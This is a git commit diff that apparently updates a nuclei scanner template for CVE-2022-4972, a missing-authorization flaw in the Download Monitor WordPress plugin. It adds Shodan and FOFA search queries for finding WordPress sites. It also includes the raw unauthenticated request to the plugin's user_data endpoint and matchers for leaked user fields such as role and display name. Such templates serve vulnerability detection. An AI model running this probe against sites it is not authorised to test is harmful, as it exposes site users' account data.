Update metadata, tags, and fix formatting issues

This commit is contained in:
Prince Chaddha
2025-11-30 07:45:53 +00:00
parent 9c85365c77
commit f4123fa659

View File

@@ -14,30 +14,32 @@ info:
cve-id: CVE-2022-4972
cwe-id: CWE-862
metadata:
verified: true
max-request: 1
vendor: WP Chill
product: download-monitor
tags: cve,cve2022
shodan-query: http.component:"wordpress"
fofa-query: body="wp-content"
tags: cve,cve2022,wordpress,wp-plugin,download-monitor,unauth
http:
- raw:
- |
GET /wp-json/download-monitor/v1/user_data HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'id'
- 'nicename'
- 'display_name'
- 'role'
condition: and
- type: status
status:
- 200
condition: and
- 200